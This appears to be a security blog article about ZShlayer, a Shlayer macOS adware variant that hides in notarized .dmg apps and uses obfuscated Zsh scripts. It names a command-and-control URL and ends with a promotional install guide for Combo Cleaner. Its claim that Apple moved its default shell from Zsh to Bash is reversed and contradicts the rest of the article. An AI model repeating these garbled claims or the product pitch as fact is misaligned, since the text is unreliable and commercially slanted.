Shlayer Mac OS malware is a persistent threat that has managed to infect millions of Mac users since now. As the cyber-criminals are now shifting their focus to scripting language as their infection vector. They are using the script-based campaigns to deliver the threat as well as execute them on the system.
Shlayer is again becoming a new thing to concern as they are now abusing Apple’s macOS notarization service. To achieve this, the malware used a “Mach-O” binary in order to execute a “Bash” shell script in the memory. This happened as Apple shifted its scripting language from Zsh to Bash as now its default shell language.
Thus, the hackers were also finding ways that allow them bypass static signature checks of Apple and eventually drop the malware on the Mac OS.
Consequently, a new variant of Shlayer malware found deploying heavily obfuscating “Zsh” scripts to avoid the security detection. The researchers at SentinalOne, discovered a new variant that was named as ZShlayer.
- They found the malware variant using highly obfuscated Zsh scripting language to bypass the security tools;
- The ZShlayer malware variant appears to be a standard Apple application that is bundled within a .dmg file.
- Thus, this malware easily passed Apple’s notarizing checks. Hence, targeting the system and started delivering uncountable numbers of unwanted ads and pop-ups.
The ZShlayer Stages
Once in, the malware executes various Bash shell scripts to pass various stages before the final payload is dropped. Additionally, it also extracts various system-related information such as: session UID, machine ID and OS version.
The ZSlayer establish communication to the servers controlled by its authors at http://dqb2corklaq0k.cloudfront.net/18.104.22.168, and exfiltrate the collected information. After which, it delivers the final payloads.
While the original Shlayer malware came into light in February 2019. The threat was rigorously being distributed as fake updates of Adobe Flash Player. However, it conceals the payloads of the virus and eventually infecting the Apple Mac devices and system.
As far as ZShlayer is concerned, it may use a bundle of cracked or pirated software to spread its payload. Thus, users should avoid relying on download pirated software or freeware from third-party platforms.
Why can ZShlayer pose a real threat?
The researchers say that the ZShlayer campaigns can further evolve to be a dangerous threat for Apple Mac users, as it was able to successfully abuse Apple’s Notarization service. And bypass the security tools.
Additionally, the prime motive of the ZShlayer is to eventually drop/install Shlayer malware on the target system. This is done to avoid the Shlayer being detected under the scanner, as it does not use the same signature as the original one. It appears to be a standard Apple Application. So, this becomes easy for the hacker to deliver it silently.
Fortunately, the ZShlayer is still not being rigorously distributed. So, users should avoid downloading unwanted or pirated software from third-party sources or unsafe websites. Rather visit the official Apple Store to do so.
Also, install a reputable anti-malware program so as to detect the presence of any unwanted program as soon as it gets installed.
How To Scan For Pirated Or Unwanted Software On Your Mac
(The above link will open a new page from where the Combo Cleaner will download)
Combo Cleaner is a complete security suite for Mac OS that is developed by “RCS LT” company. This program is featured with anti-virus scanner and system optimization tools like disk cleaner, duplicate files finder, application uninstaller, privacy scanner, and 24*7 customer support service.
How to Install and Scan with Combo Cleaner
1. Click the above button to Download the “Combo Cleaner”;
2. Once the download completes, double-click on the downloaded file;
3. After the window opens, drag the Combo Cleaner program icon and drop it into your “Applications folder” icon.
4. Now, open your “Launchpad” and click on the “Combo Cleaner” icon.
5. This will start the combo cleaner installation and updates its latest virus definition. Once done, Combo cleaner will launch;
6. Click on “Antivirus” tab and choose the scan options like Quick, Full, and custom. (Full is recommended for the first time)
7. Let the scan be completed and it will list all the threats found. Now, click on “Remove All Threats”;
8. after removing the threats, click on the “uninstaller” to find and remove any unwanted programs. Select the program from the list and its related files and then click on “Remove Selected Items“